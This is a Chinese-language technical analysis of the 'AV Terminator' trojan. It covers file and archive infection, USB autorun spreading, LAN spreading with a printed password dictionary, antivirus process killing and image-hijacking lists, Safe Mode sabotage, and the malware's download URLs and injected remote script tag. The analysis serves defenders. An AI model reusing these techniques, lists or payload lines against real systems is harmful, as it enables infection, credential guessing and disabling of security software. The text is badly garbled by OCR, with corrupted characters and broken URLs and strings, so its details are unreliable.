极虎AV终结者详细分析

1、极虎av终结者详细分析 open=recycle. 645ff040-508 m 01b-9f08-00aa002f954e)setup.exe2010 年 06 月 14 f1 星 期一 15:52原始样本名称：setup.exe样本大小：243kbsha 值：e6fd82f5b0d4db6e08f1b6d73e55c9224e14e53e获取途径：优盘 f 的 recycle. 645ff040-5081-101b-9f08-00aa002f954e文件夹中。安全阁鉴定结果：病毒一命名为trojan.win32.killav.ao运行平台windows平台。分析人：安全阁阁主一、样木的主要

2、行为：替换系统服务关联程序，加载驱动对抗杀软，破坏安金模式、感染磁盘文件、感染共享文件、 利用局域网传播、利用移动设备传播、下载文件。二、此病毒的爆发方式：计算机病毒的爆发方式通常収决于该病毒的传播方式。此病毒的传播方式有三种：1、此病毒感染系统中或局域网中的exe sl件和压缩包中的exe文件，当耒感染病毒的用 八双击了受感染的exe文件，因为被感染，所以病毒代码首先拿到控制权，将创建一个 c:booter.exe文件，然后运行启动它，z后再把控制权交还给被感染的文件。这样病毒在此 用户计算机上爆发。2、此病毒将在移动设备(如：优盘)中写入病毒即ausun.inf文件，当未感染病毒的用户计

3、算机开启了移动设备的自动播放功能，并且在其计算机上使用了带毒的移动设备，而且是通 过双击操作打开的移动设备盘符，此时病毒利用windows白动播放功能将运行在移动设备 中的 recycle.645ff040-5081-101b-9f08-00aa002f954ejsetup.exe 文件。这样病毒此用户 计算机上爆发。3、此病毒在局域网中某台计算机上爆发后，将利用自身携带的密码字典尝试登录局域网的 小其他计算机，如果登录成功则将病毒样本上传到那台计算机中c盘，命名为 config.exe(c:config.exe),并且设置一个计划任务待上传样本3分钟后病离口动运 行，从而爆发。三、病毒爆发后

4、的主体行为如下:1、判断口身爆发的路径是不是移动设备，如果是则把该路径盘符打开。（这样做的冃的是: 因为移动设备利用自动播放autorun.inf功能可以达到双击盘符运行指定程序的目的，但是 这样每次双击盘符就只能运行autorun.inf 指定的程序，而不能再打开移动设备的盘符了。 这无疑会使用户起疑，所以病毒在运行的同吋帮助用户打开了盘符。又因为病毒的运行是悄 无声息的，所以给用户的感觉是双击盘符就打开了，从而不会怀疑自己中毒了。）2、尝试打开管道.pipe96dba249-e88e-4c47-98dc-e 18e6e,并且与之通信。（如果计算 机上已经运行冇此病毒，则会创建这个管道，与以

5、后运行的病毒进行通信）如果通信成功则 说明计算机中已经运行了该病毒，此吋则保存已运行的计算机病毒通过管道发送过来的服务 名。病毒在c盘下创建文件c:delinfo.bin,其中的内容是：4个字节的标志位（此标志位的 值取决于与管道通信是否成功，成功则标志位的值是1,否则是2。该标志位用于之后病毒 操作的判断），然示是病毒自身的完整路径。病毒创建这个文件的目的是为了告诉之后的病 毒自己的位置，然后把自己删掉。3、循环执行解密操作，解密样本中的字符串，毎次循环解密两次：一次解密的得到的是服 务名另一次解密得到的是服务对应的动态链接库名。如果完全循环完毕则最终得到的解密串如下：服务名有：appmgm

6、t.bits.fastuserswitchingcompatibility.wmdtnpmsn.xmlprov.eventsystem.ntmssvc.u pnphost.ssdpsrv.netman.nla.tapisrv.browser.ciyptsvc.helpsvc.remoteregistry.schedule（这 些 串 实 际 上 对 应 于 注 册 表 屮 hkey_local_machinesoftwaremicrosoftwindows ntcurrcntvcrsionsvchost 路径 下netsvcs类型的若干服务名称）动态链接库有：appmgmts.qmgr.shs

7、vcs.mspmsnsv.xm lprov.es.ntmssvc .upnphost.ssdpsr man.mswsock.tapisrv.browser.cryptsvc.pchsvc.regsvc.schedsvc（这些串实际上对应于以上服务所要加载的动态链接库的名字）在循环过程中，每得到一个服务名，则为先前进行管道通信吋得到的服务名进行比较，如果 -致则继续循环解密下一个，如果不一致则执行以下操作（这样判断以保证病毒不会重复运 行同一个服务，而是每次运行一个不同的服务）：打开此服务，检测此服务状态是否运行，如果运行将其停止。关闭系统对该服务所对应动态 库的文件保护，然后把病毒自身文件的属

8、性修改为动态链接库，并替换此服务对应的动态库 为修改后的病毒口身文件。然后启动该服务从而运行病毒，最后把当前病毒进程结束。四、病毒被以服务的形式运行起来以后的行为如下：1、读取c:wdelinfo.bin >|«的内容，将其中指定的文件删除,然后删除cadelinfo.bin文件。2、在系统中捜索avp.cxc(卡巴)和bdagcnt.cxc(bitdcfcndcr)进程，如果找到则分配4000000h 大的空间内存，然后全部写入nop,并且执行，执行完毕在释放内存。(用此方法进行免杀)3、解密字符串，解密后先后得到如下字符串：c:windowswindowsupdata7.j

9、pggr4004http:/a.nba 1001 .com:6969/announce;http:/b.nba 1001 .com:6969/announce;http:/c.nba 1001 .com:6969/ announce;http:/cl.nba 1001 .com:6969/announce;http:/e.nba 1001 .com:6969/announce;:6969/announce;http:/g.nba 1001 .com:6969/announce;http:/h.nba 1001 .com:6969/announce;http:/i.nbal():6969/ann

10、ounce;http:/j .nba 1001 .com:6969/announce;up5.nba 1001-comdown/33.rarupkvmonxp.kxp.kvsrvxrexe.avp.exe.avp.exe.avp.exe.ravmond.exe.ravtask.exe.rsagent.exe. rsnetsv 匚 cxc.rstray.exc.scanfnn.cxc.ccente r.exc.kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui. e

11、xe.ekrn.exe.ccs vchst.exe.ccsvchstexe.ccsvchst.exe.mcagent.exe.mcmscsvc.exe.mcnasvc.exe.mcods.exe.mcproxy.exe.mcshield.exe.mcsysmon.cxc.mevsshki.cxc.mpfsrv.cxc.mcsacorc.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.a vcenter.exe.ufseagnt.exe.tmbmsrv.

12、exe.sfctlcom.exe.tmproxy.exe.360softmgrsvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccenter.exe. vsserv.exe.mpsvc.exe.mpsvc l.exe.mpsvc2.exe.mpmon.exc.ast.cxc.360spccdld.cxc.360softmgrsvc.cxc.360tray.exe. 修 复 工 rt.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe.z

13、hudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxtray.exe4、在临时目录屮禅放驱动文件forter.sys,并加载到内存。紧接着把驱动文件和为了加载驱 动而创建的注册表服务项删除。5、修改自身服务的启动方式为自启动。6、与驱动进行通倍，让驱动程序在注册表中设置镜像劫持项。劫持如下程序的运行：ccsvchst.cxc.mcagcnt.exc.mcmscsvc.cxc.mcnasvc.cxc.mcods.cxc.mcproxy.cxc.mcshicld.exe. mcsysmon.exe.mcvsshld.exe.mpfsrv.ex

14、e.mcsacore.exe.msksrver.exe.sched.exe.avguard.exe.avmailc.exe.avwebgrd.exe.avgnt.exe.sched.exe.avguard.exe.a vcenter.exe.ufseagnt.exe.tmbmsrv.exe.sfctlcom.exe.tmproxy.exe.360softmgrsvc.exe.360tray.exe.qutmserv.exe.bdagent.exe.livesrv.exe.seccente 匚 exe. vsserv.exe.mpsvc.exe.mpsvc 1 .exe.mpsvc2.exe.m

15、pmon.exe.ast.exe.360speedld.exe.360softmgrsvc.exe.360tray.exe 修 复 工 a.exe.360hotfix.exe.360rpt.exe.360safe.exe.360safebox.exe.krnl360svc.exe zhudongfangyu.exe.360sd.exe.360rp.exe.360se.exe.safeboxtray.exe7、与驱动通信，结束nj能存在的杀毒软件进程。被结束的进程有：kvmonxrkxp.kvsrvxrexe.avp.exe.avp.exe-avp.exe.ravmond.exe.ravtask

16、.exe.rsagent.exe. rsnetsv r.exe.rstray.exe.scanfrm.exe.ccente 匚 exe kavstart.exe.kissvc.exe.kpfw32.exe.kpfwsvc.exe.kswebshield.exe.kwatch.exe.kmailmon.exe.egui. cxc.ckrn.cxc.ccs vchst.cxc.ccsvchst.cxc8、仓ij建线程反复启动ie,并且打jf h*p:/tj.nbal001 .net:7777/tj/mac.html网站,十秒钟后将 其关闭然后重新启动以此增加该网站的点击率。9、创建线程获得域名：“

17、www.3-0b6f-415d-b5c7-832f”的ip地址，笔者测试吋得到 *21 ”撚后在如 k url 下载:h*p:/21:8080/down/33.rar 文件并保存到 c:windowswindowsupdata7.jpgo 然 后将c:windowswindowsupdata7.jpg复制到临时冃录中，扩展名为.nls,文件名为一个 随机数。然后将此文件映射到内存。此文件中的内容是加密数据，将其解密。然后将其中的 部分数据在c:documeladminlocalsltemp路径卜先成一个可执行程序，名字是个 随机名。然后启动这个程序。

18、10、创建线程创建命名管道w.pipe96dba249-e88e-4c47-98dc-e18e6e,并且实吋对其进 行监听，检测是否又冇同类病毒被运行，如果冇则与z通信，发送自身的服务名过去。11删 除 如 下 注 册 表 项：hkey_local_machinesystemcurrentcontrolsetcontrolsafebootminimalhkey_local_machinesystemcurrentcontrolsetcontrolsafebootnetworko 从而破坏破坏安全模式。12、创建线程获得域名：“www.3-0b6f-415d-b5c7-832f”的ip地址，笔者

19、测试时得到”202.9&24.121”,然后在如下url下载：下 载http:/202.98.2421:8080/down/xx.rar文 件 并 保 存 到c:docume-ladminlocals-ltemp 路径卜名字随机，扩展名为.txt。读収文件内容，并且发送给驱动此文件的内容。然后将这个文件移动到如下路径： “c:windowssystcm32c_30279.nls”。13、解密字符串，先后得到如下串：administrator.guest.admin.root1234.password.6969.harlcy. 123456.golf.pussy.mustang.l 11

20、1 .shadow. 1313.fish.5150.7777.qwerty, baseball. 2112.1etmein.l 2345678.12345.ccc.adniin.5201314.qq523.1234567.123456789.654321.54321.11 l.oooooo.abc.pw .11111111.88888888.pass.passwd.database.abcd.abc 123.pass.sybase.l pute 匚 52o.supe 匚 123asd.0.ihavenopass.godblessyou.enable.xp.2002.2003.

21、2600.alpha. 110.111111.121212.123123.1234qwer. 123abc.007.a.aaa.patrick.pat.administrate i*.root.scx.god.*you.*.abc.test.test 123.temp.templ23. win.pc.asdf.pwd.qwer.yxcv.zxcv.home.xxx.owner.login.login.pw 123.love.my pc. my pc 123.admin 123.mypass.mypass 123.901100.<script type="text/javascr

22、ipth src=,http:/web.nbalo():8888/tj/tongji.js"></script>.14>修改host文件屏蔽如下网站：antivir-antivir-pe.desunbelt-.free-15、判断hc:program fileswinrarrar.exe*'文件是否存在，如果存在保存路径。16、创建线程，循坏遍历所有驱动器，但排除a盘和b盘和光驱，遍历这些驱动器卜的所 有文件和文件夹，但是跳过c盘下的如下文件夹："windows"“winnt “"documents and setting

23、s"nsystem volume information"“recycler”"common files""complus applications""installshield installation information"h internet explorer""messenger""microsoft frontpage"“movie maker*1“msn gaming zone”hnetmeetingh"outlook express*1&q

24、uot;windows media player"''windows nt""windowsupdate"“winrar”“thunder""thunder network"判断文件类型: 如果是exe,则在末尾添加一个节，节名为“.tc”，然后把病毒代码写到新添加的节数据区 中，修改入口地址是病毒首先获得控制权。如果是hg、hunl、asp、aspx判断是否已经感染，没感染的则在末尾写如下感染代码：<script type="text/javascript" src=":8888/tj/tongji.js"></script>.如果是rar,现将压缩包里的文件解压到临吋文件夹，然后感染，感染后在压缩回去，并把临 时文件夹删除掉。17、创建线程：循环查找移动设备，如來找到检测其中是否存在autorun.inf文件夹，如果 存在将其重命名为一个随即名。然后创建autorun.inf文件，内容如下。autorunopen=recycle. 645ff040-5081-101 b-9f08-00aa00